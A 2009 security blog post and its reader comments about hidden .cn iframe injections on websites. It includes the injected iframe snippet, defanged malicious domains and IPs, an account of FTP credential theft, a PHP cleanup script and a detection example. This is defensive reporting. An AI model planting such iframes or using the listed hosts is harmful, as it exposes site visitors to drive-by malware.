
Hidden CN Iframes Are Still Prevalent

   25 Jun 09   Filed in Website exploits

This post is a reminder that .cn iframe attacks are still among the most prevalent website infections.

The URLs of the malicious iframes change over time. The hackers introduce new suffixes (campaign names?) such as mozila, banner, cocacola and pepsi, and add more and more domain names.

Port 8080

Since the pepsi campaign they have been using port 8080 in the URLs.

The current form of the malicious code looks like this:

< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>

It is usually injected at the bottom of index (home) pages.

DNS records

All these .cn domains point at the same IP address, or rather, at the same group of IP addresses. Each of them can serve malicious content from 5 different servers in different countries, so that if one server is temporarily unavailable or permanently shut down, the remaining four will still be working.

Here is the output of the dig command that shows 5 “A” records (June 22):

$ dig shopmoviefestival.cn
...
;; QUESTION SECTION:
;shopmoviefestival.cn.          IN      A
;; ANSWER SECTION:
shopmoviefestival.cn.   432     IN      A       77 .37 .19 .173
shopmoviefestival.cn.   432     IN      A       88 .191 .78 .48
shopmoviefestival.cn.   432     IN      A       89 .171 .115 .10
shopmoviefestival.cn.   432     IN      A       90 .156 .144 .78
shopmoviefestival.cn.   432     IN      A       91 .121 .146 .101
...

This set of IP addresses changes over time as some servers become unavailable. At the time of this article's publication (June 25) the set of A records is: 90 .156 .144 .78, 77 .37 .19 .179, 77 .37 .18 .36, 77 .37 .19 .43, 77 .37 .19 .173.

Not only .cn domains

A couple of days ago I noticed similar hidden iframes with .pl domains in URLs.

a3h . pl:8080/ ts/ in .cgi?pepsi76 and a3l . pl:8080/ ts/ in .cgi?pepsi80

Not surprisingly, these domains resolve to the same set of 5 IPs.

Update (June 29, 2009): I have found similar iframes with .ru domains in URLs: a3h .ru and a5l .ru

Update (July 8, 2009): I have found a similar iframe with a .at domain in its URL: a3l .at

Update (July 21, 2009): Now we have .in: q3e .in and q3t .in

Here are some other domain names that you may encounter as the src parameter of these hidden iframes:


Detection

Hidden iframes are easily detected by Unmask Parasites.
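As an added example (not the Unmask Parasites tool's own code), here is a small Python check for the pattern described above: an iframe that is hidden by CSS, points off-site, and uses port 8080. The sample page and the hidden-frame.example host are constructed placeholders, not domains from the post.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# CSS that hides a frame from the visitor while the browser still loads it
HIDDEN_CSS = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)


class IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag, wherever it appears."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def suspicious_iframes(html, own_host):
    """Return [(src, reasons)] for frames that are both hidden and off-site;
    visible embeds are not reported, and port 8080 (the campaign's port) is
    recorded as an extra reason."""
    parser = IframeCollector()
    parser.feed(html)
    found = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        parts = urlsplit(src)
        reasons = []
        if HIDDEN_CSS.search(attrs.get("style", "")):
            reasons.append("hidden")
        if parts.hostname and parts.hostname.lower() != own_host.lower():
            reasons.append("off-site")
        if parts.port == 8080:
            reasons.append("port-8080")
        if "hidden" in reasons and "off-site" in reasons:
            found.append((src, reasons))
    return found


# Constructed sample page: a visible embed, then the injected frame appended after
# </html> as in the post (hidden-frame.example is a placeholder, not a real host).
SAMPLE_PAGE = """<html><body><p>Welcome</p>
<iframe src="http://player.example.net/embed/1" width="425" height="344"></iframe>
</body></html>
<iframe src="http://hidden-frame.example:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
"""

if __name__ == "__main__":
    for src, why in suspicious_iframes(SAMPLE_PAGE, "www.example.org"):
        print(src, ", ".join(why))  # one line per suspicious frame
```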

Removal

You can find the clean-up instructions in my original post about the .cn iframes. They include malware removal from the local computer, changing and securing FTP passwords, and finally uploading a clean copy of the website from a backup.

Finally, if your site is blacklisted by Google, request a malware review via Webmaster Tools as soon as possible. If your site is clean, the warning will be removed in a few hours.

As always, any comments are welcome.

Reader's Comments (33)

  1. |

    Just got one of these attacks today. Such a bother to stop in the middle of work and have to start up AVG and clean up the mess. Thank god it only infected one of the websites.

    Muchas gracias for the info about clearing up the problem.

  2. |

    I have a theory about the use of port 8080:

    http://wirewatcher.wordpress.com/2009/06/26/sidestepping-inline-url-content-filters/

  3. |

    I’ll be posting new domain names used in this attack here:

  4. |

    I can add some more, too:

    bigtopmanagement .cn
    lotwager .cn

    And possibly also related:

    mialo-goodle dot info / cn.php ? mkx

    …although that last one doesn’t resolve at the moment.

  5. |

    I’m monitoring a site with a .cn:8080 defacement. This has now changed to:

    hxxp: / / b1a dot ru : 8080 / index dot php

  6. |

    Hi, I work for a hosting company and we’re seeing so many of these attacks. Driving me insane, but thanks for the blog, it’s helped me keep on top of this mess.

  7. |

    Hello friends,

    As I was also facing the same problem, but after changing my FTP password I solved the problem. So try to change your FTP password, and enjoy.

    Regards,
    Balmukund Gohil
    Web Designer
    9819889092.

  8. |

    We got hit too, right at the end of June. They injected their iframe code, exactly like that posted above but with the bigtopbrands domain and slightly different dimensions, right after the body tag in every file with “index”, “home”, or “main” in the name. This resulted in a gap of a hundred or so pixels at the top of each affected page when viewed in a browser, so fortunately I could see something was wrong right away and get it fixed. Also, the last couple lines of each modified page were missing.

    I found the attack in our logs, and as near as I can tell, here’s what happened.

    They logged in using our FTP credentials. (We are guessing they got them by using an exploit in Adobe Reader v8.) They downloaded one file, index.htm, and then logged out. This took a total of three seconds from connection to logout.

    Three seconds after they logged out, they logged back in from a completely different IP, uploaded the modified version of the file they’d just downloaded, and logged back out. Again, this took just three seconds to do.

    Five seconds later, they logged back in from yet another IP and downloaded another index file (I have one in each subdirectory). In a total of five seconds, they had it and logged out.

    Three seconds later, a fourth IP logged in and uploaded that index file with their code added, then logged out.

    This cycle repeated until they had injected their code into all the targeted files on my entire site, including a forum (which their code or the missing last lines broke, another big clue something was amiss).

    Out of 208 total logins, only 17 IPs were used twice, and only one was used 3 times. All the rest were unique. They resolve to countries all over the world: India, Nepal, Hong Kong, Argentina, the U.S., Australia, Canada, Japan, Hungary, and Brazil, to name just a random few.

    The entire attack took just over an hour, so if you have a lot of index-type files like I do and happen to catch them in the act, changing your FTP password should stop them (then immediately follow the posted clean-up instructions), but blocking IPs won’t affect them for even a moment; there are just too many.

    Thanks for the post. It gave me some great insight into exactly what happened to us and how.

    • |

      Hi Mac,

      Thanks for sharing this info. This is a great description of a distributed attack.

    • |

      Hi Mac,

      I gave the change-your-FTP-credentials advice to a customer, but it didn’t stop the defacements.

      Here’s why:

      The customer’s local machine had password-stealing malware on it that was uploading his FileZilla settings. He would change the FTP password on the server, and then change it in FileZilla. Soon after he did that, the new FileZilla passwords got uploaded, and his site was defaced again!

      Take care if you’re using FileZilla, and don’t use it to store your passwords!

      alec

      • |

        Wow, that’s bad news. FileZilla is like one of the best FTP programs to use. Is FileZilla doing something to prevent this from happening?

        I posted my experience as well, but so far I have not been helped yet. I’m not sure if my PCs are clean yet, so I dare not change anything in my FTP program yet. I just asked my hosting guy to change my password for me.

        Here’s my post
        http://forum.lowyat.net/index.php?act=ST&f=25&t=1091018&st=0#entry27188734

        • |

          I’m not sure how the malware steals FTP credentials. In case it extracts them from program configuration files, you can try not to save passwords inside your FTP client. Just type them in every time you connect to your server.

          Another option is to create an alias for your site domain in the “hosts” file and use this alias in FTP program settings. This alias will be useless if used from another computer.

          FileZilla also has a Public Key Authentication option (I didn’t try it though)

          • |

            The most interesting thing is that the guys who were defacing the website seem to know the guys who had the password-stealer on my customer’s PC. They may even be one-and-the-same party, although that could be tricky to prove.

            alec

          • |

            Hi Denis,

            In this specific instance, LDPinch was responsible:

            http://www.viruslist.com/en/viruses/encyclopedia?virusid=147349

            I actually saw the FileZilla usernames/passwords get uploaded to Hacker HQ (along with a load of other stuff). The article above says that the upload is made via SMTP, but this time it was via an HTTP POST request to a .cn domain hosted in Ukraine.

            Quite scary, really!

            alec

  9. |

    Alec,

    Great link to the viruslist. It explains how malware steals passwords. Why sniff traffic or intercept keystrokes (this activity can be easily detected by antivirus tools) when you can simply read everything from the disk where FTP programs store users’ credentials in plain text?

  10. |

    Just got one of these attacks today. My domain is [dot]com[dot]ar (Argentina). Every index.htm and index.php has the iframe. I’m working with Joomla 1.5, if this helps someone.
    I guess I’ll reinstall the whole e-commerce site.

  11. |

    Three more:

    shopmovieproduction .cn
    b7p .ru
    nyfilmlife .cn

    • |

      “to err is human”

      Was only two more :) b7p .ru was already listed :)

  12. |

    I found “q38 .ru” appearing in http://www .tresearchexpo.nrct .go .th (a Thailand gov’t web site) via Unmask Parasites. This must be a malicious URL.

  13. |

    A client of mine was also targeted. Addresses used:
    06-07-2009 >> u1w .ru
    08/07/2009 >> u8r .ru
    10-07-2009 >> update .cn
    12-07-2009 >> u9j .ru
    24-07-2009 >> xe5 .in

  14. |

    My client is on holiday, so I can’t change the FTP password. Because I have to clean the site every other day, I wrote a script that does that for me. By calling the script every hour with a cronjob, the site stays clean until she comes back.

    Here’s the script. I hope it’s useful for other people.
    (make sure to back up your site before using this one)

    <?php
    $path = "."; // define the path as relative

    // filenames infected in Joomla sites:
    list_dir($path, 'index.php');
    list_dir($path, 'index2.php');
    list_dir($path, 'index3.php');
    list_dir($path, 'mainbody.php');
    list_dir($path, 'index.html');

    // Walk $path recursively; in every file named $filename, report and strip
    // the first <iframe>...</iframe> block found.
    function list_dir($path, $filename)
    {
        $dir_handle = @opendir($path) or die("unable to open $path");
        while (false !== ($file = readdir($dir_handle))) {
            if ($file == '.' || $file == '..') {
                continue;
            }
            $dir = $path . '/' . $file;
            if (is_dir($dir)) {
                list_dir($dir, $filename); // recurse into subdirectories
            } elseif (strcmp($file, $filename) == 0) {
                $content = file_get_contents($dir);
                if ($content) {
                    // find the iframe (non-greedy, so only one block is matched)
                    if (preg_match('/<iframe[^>]*>(.*?)<\/iframe>/s', $content, $iframe)) {
                        $hacked = htmlspecialchars($iframe[0]); // sanitize HTML for viewing
                        echo "\n$dir $hacked";
                        // plain string replacement: the matched HTML must not be used as a regex
                        $cleaned = str_replace($iframe[0], '', $content);
                        $thisfile = fopen($dir, 'w') or die("unable to open file $file");
                        fwrite($thisfile, $cleaned);
                        fclose($thisfile);
                        echo '(cleaned)';
                    }
                }
            }
        }
        closedir($dir_handle);
    }
    ?>

  15. |

    Dear Denis,

    could you explain how this spyware could injure our computer? Where should(n’t) we click to (avoid) the injuries?

    Thanks!

  16. |

    A few more URLs for you:
    http ://q3c .ru:8080/index.php
    http ://q1e .ru:8080/index.php
    http ://x8o .ru:8080/ts/in.cgi?pepsi114

    We had almost every index.html, index.php and several other files infected with these iframes on our server.

  17. |

    Found another on one of my clients’ sites:
    http ://b9g .at:8080/index.php

  18. |

    I got infected with http ://some-other-life .ru:8080/index.php. Good thing I have a backup of the files on my WordPress blog and was able to restore it. The problem is that the attack may reoccur. Damn.

  19. |

    Oh no, I’m being attacked again, help.

  20. |

    I don’t know if the problem attacking one of the servers that I visit is this particular problem, but when my browser popped up with a warning and a Google SafeBrowsing report, one of the links that was apparently hosting malware was visaforchina .co .uk

  21. |

    [...] also noticed that Gumblar (and this new attack) infects sites that were previously infected with hidden malicious iframes. That iframe injection attack steals FTP credentials from configuration files of 10 popular FTP [...]

  22. |

    [...] Thousands of websites and hosting accounts have been compromised in this way and have suffered attacks with hidden iframe injections, Gumblar, redirects to fake antivirus sites, [...]